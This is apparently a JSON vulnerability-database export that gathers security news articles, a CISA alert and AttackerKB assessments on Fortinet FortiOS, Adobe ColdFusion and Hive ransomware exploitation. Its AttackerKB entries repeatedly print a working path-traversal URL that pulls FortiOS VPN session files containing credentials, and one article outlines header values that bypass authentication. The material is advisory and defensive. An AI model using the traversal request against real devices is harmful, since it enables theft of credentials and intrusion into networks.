"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], 
"modified": "2022-02-18T07:40:44", "id": "THN:F25FAD25E15EBBE4934883ABF480294D", "href": "https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-16T10:16:53", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjg8T1EAux0KjF2qw7H0gjPvv33p8vffhuoidvlZzQAXU8bJN3Nq5k5bM0kcjuLxKZop93NztZC75oLL4gBZQ0esCjwHeIfb7ItaCyRCe-DegY_7roFlj_V-9jA86hVciMrc8cTkPflp9xUYKw04ig9pO6BNhbFWAf5hCt6clL2R4eWcm80nFGB9SsD/s728-e365/alert.png>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on March 15 [added](<https://www.cisa.gov/news-events/alerts/2023/03/15/cisa-adds-one-known-exploited-vulnerability-catalog>) a security vulnerability impacting Adobe ColdFusion to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.\n\nThe critical flaw in question is [CVE-2023-26360](<https://nvd.nist.gov/vuln/detail/CVE-2023-26360>) (CVSS score: 8.6), which could be exploited by a threat actor to achieve arbitrary code execution.\n\n\"Adobe ColdFusion contains an improper access control vulnerability that allows for remote code execution,\" CISA [said](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\nThe vulnerability impacts ColdFusion 2018 (Update 15 and earlier versions) and ColdFusion 2021 (Update 5 and earlier versions). 
It has been addressed in versions Update 16 and Update 6, respectively, released on March 14, 2023.\n\nIt's worth noting that CVE-2023-26360 also affects ColdFusion 2016 and ColdFusion 11 installations, both of which are no longer supported by the software company as they have [reached](<https://helpx.adobe.com/in/support/programs/eol-matrix.html>) end-of-life (EoL).\n\nWhile the exact details surrounding the nature of the attacks are unknown, Adobe [said](<https://helpx.adobe.com/security/products/coldfusion/apsb23-25.html>) in an advisory that it's aware of the flaw being \"exploited in the wild in very limited attacks.\"\n\nFederal Civilian Executive Branch (FCEB) agencies are required to apply the updates by April 5, 2023, to safeguard their networks against potential threats.\n\nCharlie Arehart, a security researcher credited with discovering and reporting the flaw alongside Pete Freitag, [described](<https://coldfusion.adobe.com/2023/03/released-coldfusion-2021-and-2018-march-2023-security-updates/#:~:text=To%20folks%20reading,old%20unsupported%20versions.\\)>) it as a \"grave\" issue that could result in \"arbitrary code execution\" and \"arbitrary file system read.\"\n",
"cvss3": {}, "published": "2023-03-16T04:47:00", "type": "thn", "title": "CISA Issues Urgent Warning: Adobe ColdFusion Vulnerability Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2023-26360"], "modified": "2023-03-16T09:17:07", "id": "THN:934BF6B94312FDB8317CCD9F5E46677C", "href": "https://thehackernews.com/2023/03/cisa-issues-urgent-warning-adobe.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-15T04:05:18", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiHjIXiW2zuHYHOZQbJKZD4p4uzwJHQdTAWhDUrxnxbxqVorwddxJ6Glgo6ERl_J1sIvlUI3AI6uug4KNSzj7-i_k6bmiZJO4-l33F5VRyfcJmN6tJHyz9cKIzx_FfcSyhR9ddrcoCcb5Gk5FgGjBg56GhIjX6JM3s3HkJJ7D0YkFii0-2B4IILpOZS/s728-e100/hack.jpg>)\n\nProof-of-concept (PoC) exploit code has been made available for the recently disclosed critical security flaw affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager, making it imperative that users move quickly to apply the patches.\n\n\"FortiOS exposes a management web portal that allows a user to configure the system,\" Horizon3.ai researcher James Horseman [said](<https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/>). 
\"Additionally, a user can SSH into the system which exposes a locked down CLI interface.\"\n\nThe issue, tracked as [CVE-2022-40684](<https://thehackernews.com/2022/10/fortinet-warns-of-new-auth-bypass-flaw.html>) (CVSS score: 9.6), concerns an [authentication bypass](<https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/>) vulnerability that could allow a remote attacker to perform malicious operations on the administrative interface via specially crafted HTTP(S) requests.\n\nA successful exploitation of the shortcoming is tantamount to granting complete access \"to do just about anything\" on the affected system, including altering network configurations, adding malicious users, and intercepting network traffic.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjRUF5zXRq0j7JtozHreYQFvBZmHZaK79k53nzd5BkO7GRapjoRFkekYnIkcLCXVxw9mkLJS3UHKjGxK35wSa1VoHFc0Zf6y_GWxV0-TUy9uwKyXDgo3Jfsu6LvlLgEj49ayxN49j9vIbADLJYnPG5XgMHOvHquE-zMEAI94s02hvVLk4tDyYrLSqz4/s728-e100/poc.jpg>)\n\nThat said, the cybersecurity firm said that there are two essential prerequisites when making such a request -\n\n * Using the Forwarded header, an attacker is able to set the client_ip to \"127.0.0.1\"\n * The \"trusted access\" authentication check verifies that the client_ip is \"127.0.0.1\" and the User-Agent is \"Report Runner\" both of which are under attacker control\n\nThe release of the PoC comes as Fortinet [cautioned](<https://thehackernews.com/2022/10/fortinet-warns-of-active-exploitation.html>) that it's already aware of an instance of active exploitation of the flaw in the wild, prompting the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) to issue an advisory urging federal agencies to patch the issue by November 1, 2022.\n\nThreat intelligence firm GreyNoise has [detected](<https://viz.greynoise.io/tag/fortios-authentication-bypass-attempt?days=30>) 12 unique IP addresses weaponizing CVE-2022-40684 as of October 13, 2022, with a majority of them [located](<https://viz.greynoise.io/query/?gnql=cve%3ACVE-2022-40684>) in Germany, followed by the U.S., Brazil, China, and France.\n\nWordPress security company WordFence also said it [identified](<https://www.wordfence.com/blog/2022/10/threat-advisory-cve-2022-40684-fortinet-appliance-auth-bypass/>) probing attempts from 21 different IP addresses to \"determine whether a Fortinet appliance is in place,\" while also observing HTTP requests matching the PoC to add an SSH key to the admin user.\n\n**_Update:_** Amid a [huge uptick](<https://viz.greynoise.io/tag/fortios-authentication-bypass-attempt?days=30>) in vulnerability scans for the authentication bypass vulnerability, Fortinet on Friday released another advisory urging customers to upgrade affected appliances to the latest version as soon as possible.\n\n\"After multiple notifications from Fortinet over the past week, there are still a significant number of devices that require mitigation, and following the publication by an outside party of POC code, there is active exploitation of this vulnerability,\" the company [said](<https://www.fortinet.com/blog/psirt-blogs/update-regarding-cve-2022-40684>).\n\nIssues in Fortinet devices have been previously targeted by attackers to gain an initial foothold onto target networks. 
[CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>), which has remained one of the most weaponized flaws in recent years, prompted the firm to issue [three follow-up alerts](<https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html>) in August 2019, July 2020, and again in April 2021.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-14T03:35:00", "type": "thn", "title": "PoC Exploit Released for Critical Fortinet Auth Bypass Bug Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2022-40684"], "modified": "2022-10-15T02:56:36", "id": "THN:3474CD6C25ADD60FF37EDC1774311111", "href": "https://thehackernews.com/2022/10/poc-exploit-released-for-critical.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, 
{"lastseen": "2022-10-12T16:30:00", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhe-JObfxreJe3voT0gU0S71E013xl9EJTptEvFiIYrrr0cMALdF9FZR1Rc20JN7zmeC4ZC5In7OgjeASatCBiVJAMoaOPzikA75p2359zbFIla4cniv7wHpmaLMdvm4vDQ1qBrj6xaxkI0kesF0zlPgDbBpWlIDP7pInkBzVTb9UE9n5Gq14Dnjpq2/s728-e100/firewall.jpg>)\n\nFortinet on Monday revealed that the newly patched critical security vulnerability impacting its firewall and proxy products is being actively exploited in the wild.\n\nTracked as [CVE-2022-40684](<https://thehackernews.com/2022/10/fortinet-warns-of-new-auth-bypass-flaw.html>) (CVSS score: 9.6), the flaw relates to an authentication bypass in FortiOS, FortiProxy, and FortiSwitchManager that could allow a remote attacker to perform unauthorized operations on the administrative interface via specially crafted HTTP(S) requests.\n\n\"Fortinet is aware of an instance where this vulnerability was exploited, and recommends immediately validating your systems against the following indicator of compromise in the device's logs: user='Local_Process_Access,'\" the company [noted](<https://www.fortiguard.com/psirt/FG-IR-22-377>) in an advisory.\n\nThe list of impacted devices is below -\n\n * FortiOS version 7.2.0 through 7.2.1\n * FortiOS version 7.0.0 through 7.0.6\n * FortiProxy version 7.2.0\n * FortiProxy version 7.0.0 through 7.0.6\n * FortiSwitchManager version 7.2.0, and\n * FortiSwitchManager version 7.0.0\n\nUpdates have been released by the security company in FortiOS versions 7.0.7 and 7.2.2, FortiProxy versions 7.0.7 and 7.2.1, and FortiSwitchManager version 7.2.1.\n\nThe disclosure comes days after Fortinet [sent](<https://thehackernews.com/2022/10/fortinet-warns-of-new-auth-bypass-flaw.html>) \"confidential advance customer communications\" to its customers, urging them to apply patches to mitigate potential attacks exploiting the flaw.\n\nIf updating to the latest version isn't an option, it's recommended that users disable the HTTP/HTTPS 
administrative interface, or alternatively limit IP addresses that can access the administrative interface.\n\n**_Update:_** The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/10/11/cisa-has-added-one-known-exploited-vulnerability-catalog>) the Fortinet flaw to its Known Exploited Vulnerabilities ([KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) catalog, requiring federal agencies to apply patches by November 1, 2022.\n\nDetails and proof-of-concept (PoC) code for the vulnerability are [expected to become publicly available](<https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/>) in the coming days, in a move that could enable other threat actors to add the exploit to their toolset and mount their own attacks.\n\n\"Vulnerabilities affecting devices on the edge of corporate networks are among the most sought after by threat actors because it leads to breaching the perimeter, and CVE-2022-40684 allows exactly this,\" Zach Hanley, chief attack engineer at Horizon3.ai, said.\n\n\"Past Fortinet vulnerabilities, like [CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>), have remained some of the [top exploited vulnerabilities](<https://thehackernews.com/2021/07/top-30-critical-security.html>) over the years and this one will likely be no different.\"\n",
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T06:21:00", "type": "thn", "title": "Fortinet Warns of Active Exploitation of Newly Discovered Critical Auth Bypass Bug", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2022-40684"], "modified": "2022-10-12T13:16:52", "id": "THN:63560DA43FB5804E3B258BC62E210EC4", "href": "https://thehackernews.com/2022/10/fortinet-warns-of-active-exploitation.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-22T04:41:36", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhmriVPdP9KN_Rm4QExIE-VxKOQQ4twUOdM58BlvGOsEAl9VBRy0Fu27FLtOqwW7dMGj-2Y_smCAtn3Dp-bzBYgnr6nLyRKDYMfsm77-oCCOnQmD0W1ux7ISFnVEQKBohRvtr1y5KRZm7ovqNFhapjxZHwlzsGYk1aK1QCSffFfVj5C8aPjX_T9ikSFwYAV/s728-e365/cf.jpg>)\n\nThe U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) has [added](<https://www.cisa.gov/news-events/alerts/2023/08/21/cisa-adds-one-known-exploited-vulnerability-catalog>) a critical security flaw in Adobe ColdFusion to its Known Exploited Vulnerabilities ([KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) catalog, based on evidence of active exploitation.\n\nThe vulnerability, cataloged as [**CVE-2023-26359**](<https://nvd.nist.gov/vuln/detail/CVE-2023-26359>) (CVSS score: 9.8), relates to a deserialization flaw present in Adobe ColdFusion 2018 (Update 15 and earlier) and ColdFusion 2021 (Update 5 and earlier) that could result in arbitrary code execution in the context of the current user without requiring any interaction.\n\n[Deserialization](<https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data>) (aka unmarshaling) refers to the process of reconstructing a data structure or an object from a byte stream. But when it's performed without validating its source or sanitizing its contents, it can lead to [unexpected consequences](<https://www.acunetix.com/blog/articles/what-is-insecure-deserialization/>) such as code execution or denial-of-service (DoS).\n\nIt was [patched](<https://helpx.adobe.com/in/security/products/coldfusion/apsb23-25.html>) by Adobe as part of updates issued in March 2023. As of writing, it's not immediately clear how the flaw is being [abused in the wild](<https://viz.greynoise.io/tag/adobe-coldfusion-rce-cve-2023-26359-attempt?days=30>).\n\nThat said, the development comes more than five months after CISA [placed](<https://thehackernews.com/2023/03/cisa-issues-urgent-warning-adobe.html>) another flaw impacting the same product (CVE-2023-26360) in the KEV catalog. 
Adobe said it's aware of the weakness being exploited in \"very limited attacks\" aimed at ColdFusion.\n\nIn light of active exploitation, Federal Civilian Executive Branch (FCEB) agencies are required to apply the necessary patches by September 11, 2023, to protect their networks against potential threats.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-08-22T03:36:00", "type": "thn", "title": "Critical Adobe ColdFusion Flaw Added to CISA's Exploited Vulnerability Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26359", "CVE-2023-26360"], "modified": "2023-08-22T03:40:20", "id": "THN:878B3321978CDB69F46C7A415B46701B", "href": "https://thehackernews.com/2023/08/critical-adobe-coldfusion-flaw-added-to.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:27", "description": 
"A recent Hive ransomware attack carried out by an affiliate involved the exploitation of \"ProxyShell\" vulnerabilities in the Microsoft Exchange Server that were disclosed last year to encrypt an unnamed customer's network.\n\n\"The actor managed to achieve its malicious goals and encrypt the environment in less than 72 hours from the initial compromise,\" Varonis security researcher Nadav Ovadia [said](<https://www.varonis.com/blog/hive-ransomware-analysis>) in a post-mortem analysis of the incident. \n\nHive, which was [first observed](<https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html>) in June 2021, follows the lucrative ransomware-as-a-service (RaaS) scheme adopted by other cybercriminal groups in recent years, enabling affiliates to deploy the file-encrypting malware after gaining a foothold in their victims' networks.\n\n[ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) \u2014 tracked as CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473 \u2014 involves a combination of security feature bypass, privilege escalation, and remote code execution in the Microsoft Exchange Server, effectively granting the attacker the ability to execute arbitrary code on affected servers.\n\nThe issues were addressed by Microsoft as part of its Patch Tuesday updates for April and May 2021.\n\nIn this case, successful exploitation of the flaws allowed the adversary to deploy web shells on the compromised server, using them to run malicious PowerShell code with SYSTEM privileges to create a new backdoor administrator user, hijack the domain admin account, and perform lateral 
movement.\n\nThe web shells used in the attack are said to have been sourced from a [public git repository](<https://github.com/ThePacketBender/webshells>) and given filenames containing a random mix of characters to evade detection, Ovadia said. Also executed was an additional obfuscated PowerShell script that's part of the Cobalt Strike framework.\n\nFrom there, the threat actor moved to scan the network for valuable files, before proceeding to deploy the Golang ransomware executable (named \"Windows.exe\") to complete the encryption process and display the ransom note to the victim.\n\nOther operations carried out by the malware include deleting shadow copies, turning off security products, and clearing Windows event logs to avoid detection, prevent recovery, and ensure that the encryption happens without any hiccup.\n\nIf anything, the findings are yet another indicator that patching for known vulnerabilities is key to thwarting cyberattacks and other nefarious activities.\n\n\"Ransomware attacks have grown significantly over the past years and remain the preferred method of threat actors aiming to maximize profits,\" Ovadia said. \"It may potentially harm an organization's reputation, disrupt regular operations and lead to temporary, and possibly permanent, loss of sensitive data.\"\n"
, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T10:00:00", "type": "thn", "title": "New Incident Report Reveals How Hive Ransomware Targets Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-21T10:00:58", "id": "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "href": "https://thehackernews.com/2022/04/new-incident-report-reveals-how-hive.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2023-02-09T14:01:25", "description": "The Federal Bureau of Investigation (FBI) and CISA have released a [Joint Cybersecurity Advisory](<https://www.ic3.gov/Media/News/2021/210402.pdf>) (CSA) to warn users and administrators of the likelihood that advanced persistent threat (APT) actors are actively exploiting known Fortinet FortiOS vulnerabilities 
[CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>), [CVE-2020-12812](<https://vulners.com/cve/CVE-2020-12812>), and [CVE-2019-5591](<https://vulners.com/cve/CVE-2019-5591>). APT actors may use these vulnerabilities or other common exploitation techniques to gain initial access to multiple government, commercial, and technology services. Gaining initial access pre-positions the APT actors to conduct future attacks.\n\nCISA encourages users and administrators to review [Joint CSA AA21-092A: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks](<https://www.ic3.gov/Media/News/2021/210402.pdf>) and implement the recommended mitigations.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-02T00:00:00", "type": "cisa", "title": "FBI-CISA Joint Advisory on Exploitation of Fortinet FortiOS Vulnerabilities ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, 
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812"], "modified": "2021-04-02T00:00:00", "id": "CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-18T16:43:23", "description": "A Default Configuration vulnerability in FortiOS may allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at April 05, 2021 2:16pm UTC reported:\n\nOne of three vulnerabilities CISA and the FBI [have warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>) are being exploited by APTs to gain initial access to government and other services. 
The other two vulnerabilities in the alert are [CVE-2018-13379](<https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios?referrer=5591>), a pre-authentication path traversal bug that has been actively and widely exploited for years now, and [CVE-2020-12812](<https://attackerkb.com/topics/8qnr47UsVL/cve-2020-12812#view-assessment-91b4f49f-9243-4d47-9084-3ef8026411c2>) (an MFA bypass).\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-5591", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812"], "modified": "2023-10-07T00:00:00", "id": "AKB:91756851-9B25-4801-B911-E3226A0656B5", "href": "https://attackerkb.com/topics/sWpteHiN5z/cve-2019-5591", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T16:50:56", "description": "An Improper Limitation of a Pathname to a Restricted Directory (\u201cPath Traversal\u201d) in Fortinet FortiOS 6.0.0 to 
6.0.4, 5.6.3 to 5.6.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\n \n**Recent assessments:** \n \n**bulw4rk** at March 25, 2020 8:04pm UTC reported:\n\n**Description**\n\nDue to a pre-authenticated Path Traversal vulnerability under the SSL VPN portal on FortiOS, an attacker is able to pull arbitrary system files from the file system. One of the most critical files which an attacker may pull is \u201csslvpn_websessions\u201d which contains session information including usernames and passwords.\n\nOnce the attacker has obtained the credentials from this file, he can authenticate with those credentials, compromising the corporate perimeter.\n\n**Mitigation**\n\n * Upgrade to FortiOS 5.4.13, 5.6.8, 6.0.5 or 6.2.0 and above. \n\n * Enable 2FA. Note the attacker will not be able to log in to the VPN, but the obtained credentials are still valid (potential domain creds) to access corporate mail, etc. \n\n\n**Affected Systems**\n\n * FortiOS 6.0: 6.0.0 to 6.0.4 \n\n * FortiOS 5.6: 5.6.3 to 5.6.7 \n\n * FortiOS 5.4: 5.4.6 to 5.4.12 \n\n\nNOTE: Only if the SSL VPN service (web-mode or tunnel-mode) is enabled.\n\n**PoC**\n\nThere are some public working exploits for this vulnerability, targeting the \u201csslvpn_websessions\u201d system file.\n\nAn attacker would access the following URL:\n\n * https://`<IP_ADDRESS>`/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession \n\n\nAnd after some parsing to the binary file, something like the following output would be obtained:\n\n\n\nNOTE: Example image obtained from <https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/>\n\n**gwillcox-r7** at November 04, 2020 4:04pm UTC reported:\n\n**Description**\n\nDue to a pre-authenticated Path Traversal vulnerability under the SSL VPN portal on FortiOS, an attacker is able to pull arbitrary system files from the file system. 
One of the most critical files which an attacker may pull is \u201csslvpn_websessions\u201d which contains session information including usernames and passwords.\n\nOnce the attacker has obtained the credentials from this file, he can authenticate with those credentials, compromising the corporate perimeter.\n\n**Mitigation**\n\n * Upgrade to FortiOS 5.4.13, 5.6.8, 6.0.5 or 6.2.0 and above. \n\n * Enable 2FA. Note the attacker will not be able to log in to the VPN, but the obtained credentials are still valid (potential domain creds) to access corporate mail, etc. \n\n\n**Affected Systems**\n\n * FortiOS 6.0: 6.0.0 to 6.0.4 \n\n * FortiOS 5.6: 5.6.3 to 5.6.7 \n\n * FortiOS 5.4: 5.4.6 to 5.4.12 \n\n\nNOTE: Only if the SSL VPN service (web-mode or tunnel-mode) is enabled.\n\n**PoC**\n\nThere are some public working exploits for this vulnerability, targeting the \u201csslvpn_websessions\u201d system file.\n\nAn attacker would access the following URL:\n\n * https://`<IP_ADDRESS>`/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession \n\n\nAnd after some parsing to the binary file, something like the following output would be obtained:\n\n\n\nNOTE: Example image obtained from <https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/>\n\n**ccondon-r7** at November 22, 2020 6:52pm UTC reported:\n\n**Description**\n\nDue to a pre-authenticated Path Traversal vulnerability under the SSL VPN portal on FortiOS, an attacker is able to pull arbitrary system files from the file system. One of the most critical files which an attacker may pull is \u201csslvpn_websessions\u201d which contains session information including usernames and passwords.\n\nOnce the attacker has obtained the credentials from this file, he can authenticate with those credentials, compromising the corporate perimeter.\n\n**Mitigation**\n\n * Upgrade to FortiOS 5.4.13, 5.6.8, 6.0.5 or 6.2.0 and above. \n\n * Enable 2FA. 
